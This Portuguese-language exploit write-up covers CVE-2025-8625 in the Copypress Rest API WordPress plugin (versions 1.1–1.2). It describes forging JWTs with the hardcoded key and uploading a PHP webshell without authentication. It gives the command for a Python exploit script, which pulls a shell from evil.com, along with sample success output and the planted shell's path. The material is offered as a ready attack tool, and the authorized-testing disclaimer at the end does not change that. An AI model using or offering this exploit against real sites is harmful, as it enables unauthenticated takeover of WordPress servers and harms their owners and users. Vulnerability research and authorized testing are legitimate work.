
Copypress Rest API 1.1 - 1.2 - Ausência de Segredo JWT Configurável e Validação de Tipo de Arquivo para Execução Remota de Código Não Autenticada
Copypress Rest API 1.1 - 1.2 - Ausência de Segredo JWT Configurável e Validação de Tipo de Arquivo para Execução Remota de Código Não Autenticada
O plugin Copypress Rest API para WordPress (versões 1.1 a 1.2) é vulnerável a Execução Remota de Código através da função copyreap_handle_image().
O plugin usa uma chave de assinatura JWT codificada (hardcoded) quando nenhum segredo é definido e não valida os tipos de arquivo, permitindo que atacantes não autenticados forjem tokens e enviem arquivos arbitrários (como shells PHP) pelo endpoint do manipulador de imagens.
Nome do script: CVE-2025-8625.py
Este script Python automatiza a exploração da vulnerabilidade, permitindo gerar um JWT válido, enviar uma requisição forjada e fazer upload de um arquivo malicioso (webshell) para o site WordPress vulnerável.
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url: URL do site WordPress alvo-shell / --shell: Link direto para seu webshell ou arquivo PHP maliciosoExemplo de saída:
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
Shell enviado com sucesso! 🎉
Exemplo de caminho do shell:
https://target.com/wp-content/uploads/2025/10/shell.php
Esta ferramenta é destinada apenas a testes de penetração educacionais e autorizados.
O uso contra alvos sem permissão explícita é ilegal.
Por: Nxploited (Khaled Alenazi)